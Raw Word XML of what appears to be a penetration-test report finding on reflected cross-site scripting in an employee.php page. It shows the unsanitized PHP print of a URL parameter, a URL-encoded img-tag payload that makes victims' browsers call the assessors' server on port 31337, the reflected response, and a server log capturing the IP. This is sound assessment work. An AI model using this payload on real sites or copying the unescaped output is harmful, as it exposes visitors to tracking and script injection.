        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:commentRangeEnd w:id="22"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="22"/>
      </w:r>
      <w:r w:rsidR="00244E22">
        <w:t xml:space="preserve">Cross-Site </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00244E22">
        <w:t>Scripting(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00244E22">
        <w:t>XSS)  vulnerabilities allow an attacker to inject arbitrary script code that will be executed by a victim’s web browser. An attacker can exploit this vulnerability by sending malicious script code to a vulnerable application that passes the script to the user. Because of this, XSS attacks target the application users. The application acts as a delivery mechanism. Because the malicious code is passed to the victim’s browser through the application, the browser cannot differentiate between legitimate and malicious code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155A227D" w14:textId="77777777" w:rsidR="00335D96" w:rsidRDefault="00335D96" w:rsidP="00335D96">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Affected Locations</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE9D8D9" w14:textId="08DFF93A" w:rsidR="00335D96" w:rsidRPr="003C17E2" w:rsidRDefault="00335D96" w:rsidP="00335D96">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidRPr="003C17E2">
        <w:t>10.10.0.66</w:t>
      </w:r>
      <w:r w:rsidRPr="0013450B">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="007B3BA5">
        <w:t>login.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F30C297" w14:textId="47635F82" w:rsidR="00335D96" w:rsidRPr="003C17E2" w:rsidRDefault="00335D96" w:rsidP="00335D96">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00B51413">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007B3BA5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidRPr="003C17E2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>URL Parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5504C480" w14:textId="4F8F9B85" w:rsidR="007B3BA5" w:rsidRPr="003C17E2" w:rsidRDefault="007B3BA5" w:rsidP="007B3BA5">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidRPr="003C17E2">
        <w:t>10.10.0.66</w:t>
      </w:r>
      <w:r w:rsidRPr="0013450B">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3BA5">
        <w:t>internal/employee.ph</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360766F0" w14:textId="06E9B9B9" w:rsidR="007B3BA5" w:rsidRDefault="007B3BA5" w:rsidP="007B3BA5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00B51413">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AF642F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="003C17E2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>URL Parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F71AA18" w14:textId="43CF2261" w:rsidR="007B3BA5" w:rsidRPr="003C17E2" w:rsidRDefault="007B3BA5" w:rsidP="007B3BA5">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidRPr="003C17E2">
        <w:t>10.10.0.66</w:t>
      </w:r>
      <w:r>
        <w:t>:8001</w:t>
      </w:r>
      <w:r w:rsidRPr="0013450B">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3BA5">
        <w:t>internal/employee.ph</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14723C3C" w14:textId="7F7BBE92" w:rsidR="007B3BA5" w:rsidRDefault="007B3BA5" w:rsidP="007B3BA5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00B51413">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AF642F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="003C17E2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>URL Parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B7D69F" w14:textId="77777777" w:rsidR="00335D96" w:rsidRDefault="00335D96" w:rsidP="00335D96">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153A5C06" w14:textId="78E30000" w:rsidR="00AF642F" w:rsidRDefault="00AF642F" w:rsidP="00AF642F">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>employee.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="48B14E3B" w14:textId="6E4A53FB" w:rsidR="00335D96" w:rsidRDefault="00AF642F" w:rsidP="00335D96">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF642F">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>employee.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> page welcomes users after login by displaying their username. The employee username is stored in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF642F">
        <w:t xml:space="preserve"> URL parameter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The below figure shows the code in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF642F">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>employee.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> where the value of </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF642F">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is printed to the page.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00335D96" w14:paraId="54B73740" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="7268BCC9" w14:textId="77777777" w:rsidR="00AF642F" w:rsidRDefault="00AF642F" w:rsidP="00AF642F">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;header class="major"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="371F4DC7" w14:textId="77777777" w:rsidR="00AF642F" w:rsidRDefault="00AF642F" w:rsidP="00AF642F">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">     &lt;p&gt;&lt;b&gt;Welcome, &lt;?</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="46F78E5B" w14:textId="77777777" w:rsidR="00AF642F" w:rsidRDefault="00AF642F" w:rsidP="00AF642F">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">     if($_GET['authenticated</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>']=</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>='1'){</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="221D0257" w14:textId="77777777" w:rsidR="00AF642F" w:rsidRDefault="00AF642F" w:rsidP="00AF642F">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">     print($_GET["user"]</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="4DEF8FCF" w14:textId="77777777" w:rsidR="00AF642F" w:rsidRDefault="00AF642F" w:rsidP="00AF642F">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>} else {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A6CC79F" w14:textId="77777777" w:rsidR="00AF642F" w:rsidRDefault="00AF642F" w:rsidP="00AF642F">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>print(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>"ERROR: Not Authenticated");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="656E54C7" w14:textId="3A330D48" w:rsidR="00335D96" w:rsidRPr="004E111C" w:rsidRDefault="00AF642F" w:rsidP="00AF642F">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>} ?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13CF6DBE" w14:textId="11E1D8AB" w:rsidR="00335D96" w:rsidRDefault="00335D96" w:rsidP="00335D96">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">PHP Code to </w:t>
      </w:r>
      <w:r w:rsidR="00AF642F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Welcome User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00780F23" w14:textId="63C90FDD" w:rsidR="000A4289" w:rsidRDefault="00AF642F" w:rsidP="00335D96">
      <w:r>
        <w:t xml:space="preserve">The parameter data is printed directly to the page without </w:t>
      </w:r>
      <w:r w:rsidR="000A4289">
        <w:t xml:space="preserve">validation or sanitization. This allowed the assessment team to insert malicious scripts into the page content by editing the value of the </w:t>
      </w:r>
      <w:r w:rsidR="000A4289" w:rsidRPr="000A4289">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidR="000A4289">
        <w:t xml:space="preserve"> URL parameter. By crafting a URL with a </w:t>
      </w:r>
      <w:r w:rsidR="000A4289" w:rsidRPr="000A4289">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidR="000A4289">
        <w:t xml:space="preserve"> value that pointed to an externally hosted file, the assessment team was able to capture the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000A4289">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000A4289">
        <w:t xml:space="preserve"> address of any user who clicked the malicious URL. The following figures show the request to the malicious URL and the application response with embedded HTML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C776AF" w14:textId="77777777" w:rsidR="000A4289" w:rsidRPr="00F62F5D" w:rsidRDefault="000A4289" w:rsidP="000A4289">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0A4289" w14:paraId="0E954D26" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="055FD19C" w14:textId="77777777" w:rsidR="000A4289" w:rsidRDefault="000A4289" w:rsidP="000A4289">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>GET /internal/employee.php</w:t>
            </w:r>
            <w:r w:rsidRPr="000A4289">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>?name=%3Cimg%20src%3d%22http%3a%2f%2f10%2e10%2e0%2e10%3a31337%2ftest%22%3E</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47F8F66F" w14:textId="77777777" w:rsidR="000A4289" w:rsidRDefault="000A4289" w:rsidP="000A4289">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Host: 10.10.0.66</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7772EA59" w14:textId="3512D2F9" w:rsidR="000A4289" w:rsidRPr="00F62F5D" w:rsidRDefault="000A4289" w:rsidP="000A4289">
            <w:pPr>
              <w:pStyle w:val="omittedforbrevity"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="10BD652D" w14:textId="1966B535" w:rsidR="000A4289" w:rsidRPr="00F62F5D" w:rsidRDefault="000A4289" w:rsidP="000A4289">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0A4289" w14:paraId="6E40EFE8" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="22552276" w14:textId="77777777" w:rsidR="000A4289" w:rsidRDefault="000A4289" w:rsidP="000A4289">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>HTTP/1.1 200 OK</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3717C08A" w14:textId="77777777" w:rsidR="000A4289" w:rsidRDefault="000A4289" w:rsidP="000A4289">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Date: Thu, 27 Apr 2023 20:20:30 GMT</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25424666" w14:textId="77777777" w:rsidR="000A4289" w:rsidRDefault="000A4289" w:rsidP="000A4289">
            <w:pPr>
              <w:pStyle w:val="omittedforbrevity"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A938FD7" w14:textId="77777777" w:rsidR="000A4289" w:rsidRDefault="000A4289" w:rsidP="000A4289">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>&lt;div class="container"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A0234AD" w14:textId="77777777" w:rsidR="000A4289" w:rsidRDefault="000A4289" w:rsidP="000A4289">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>&lt;header class="major"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11AB9735" w14:textId="21AA98B8" w:rsidR="000A4289" w:rsidRDefault="000A4289" w:rsidP="000A4289">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>&lt;p&gt;&lt;b</w:t>
            </w:r>
            <w:r w:rsidRPr="000A4289">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>&gt;Welcome, &lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000A4289">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>img</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000A4289">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000A4289">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>src</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000A4289">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>="http://10.10.0.10:31337/test"&gt;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>&lt;/b&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7ED4953B" w14:textId="77777777" w:rsidR="000A4289" w:rsidRDefault="000A4289" w:rsidP="000A4289">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>&lt;/p&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C6DF57D" w14:textId="77777777" w:rsidR="000A4289" w:rsidRDefault="000A4289" w:rsidP="000A4289">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>&lt;/header&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="616F9C64" w14:textId="77777777" w:rsidR="000A4289" w:rsidRDefault="000A4289" w:rsidP="000A4289">
            <w:pPr>
              <w:pStyle w:val="omittedforbrevity"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F1CC867" w14:textId="11CF9C52" w:rsidR="000A4289" w:rsidRPr="00B40A5B" w:rsidRDefault="000A4289" w:rsidP="000A4289">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;/html&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4A1C7E6C" w14:textId="77777777" w:rsidR="000A4289" w:rsidRDefault="000A4289" w:rsidP="00335D96"/>
    <w:p w14:paraId="788C9FBC" w14:textId="3FCC51BF" w:rsidR="000A4289" w:rsidRDefault="000A4289" w:rsidP="00335D96">
      <w:r>
        <w:t>The link to the image was invalid, meaning no real image was displayed on the site.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FBAF5C" w14:textId="43F3A344" w:rsidR="000A4289" w:rsidRDefault="000A4289" w:rsidP="000A4289">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68549AC2" wp14:editId="69652AA9">
            <wp:extent cx="4457700" cy="1009650"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="19050"/>
            <wp:docPr id="47047759"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759" name="Picture 8"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10096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Embedded Image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3180BBED" w14:textId="374B8153" w:rsidR="000A4289" w:rsidRPr="000A4289" w:rsidRDefault="000A4289" w:rsidP="000A4289">
      <w:r>
        <w:t>However, when the assessor’s browser attempted to load the image, it sent a request to the team’s server, as shown below:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="000A4289" w14:paraId="28260428" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="7CE9D271" w14:textId="77777777" w:rsidR="000A4289" w:rsidRDefault="000A4289" w:rsidP="000A4289">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">GET </w:t>
            </w:r>
            <w:r w:rsidRPr="00A154A9">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>/test</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="313B319D" w14:textId="77777777" w:rsidR="000A4289" w:rsidRDefault="000A4289" w:rsidP="000A4289">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Host: </w:t>
            </w:r>
            <w:r w:rsidRPr="00A154A9">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>10.10.0.10:31337</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57711456" w14:textId="51390F3F" w:rsidR="000A4289" w:rsidRPr="00B40A5B" w:rsidRDefault="00A154A9" w:rsidP="00A154A9">
            <w:pPr>
              <w:pStyle w:val="omittedforbrevity"/>
            </w:pPr>
            <w:r>
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="557A2EFF" w14:textId="60EE0BED" w:rsidR="000A4289" w:rsidRDefault="000A4289" w:rsidP="000A4289">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Request from Browser to Attacking Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD7E083" w14:textId="700D55DD" w:rsidR="00A154A9" w:rsidRPr="000A4289" w:rsidRDefault="00A154A9" w:rsidP="00A154A9">
      <w:r>
        <w:t>The Hyperthetical team’s server logs show the request and the IP address of the user.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A154A9" w14:paraId="3D6D8EB4" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="1C5BE983" w14:textId="77777777" w:rsidR="00A154A9" w:rsidRDefault="00A154A9" w:rsidP="00A154A9">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$ python3 -m </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>http.server</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 31337</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D1A0FA6" w14:textId="77777777" w:rsidR="00A154A9" w:rsidRDefault="00A154A9" w:rsidP="00A154A9">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Serving HTTP on 0.0.0.0 port 31337 (http://0.0.0.0:31337/) ...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BD70A9A" w14:textId="77777777" w:rsidR="00A154A9" w:rsidRDefault="00A154A9" w:rsidP="00A154A9">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">10.10.0.10 - - [27/Apr/2023 17:57:16] code 404, message File not </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>found</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="3AF3FE3F" w14:textId="43BE91BC" w:rsidR="00A154A9" w:rsidRPr="00B40A5B" w:rsidRDefault="00A154A9" w:rsidP="00A154A9">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="00A154A9">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>10.10.0.10</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> - - [27/Apr/2023 17:57:16] </w:t>
            </w:r>
            <w:r w:rsidRPr="00A154A9">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>"GET /test</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> HTTP/1.1" 404 -</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
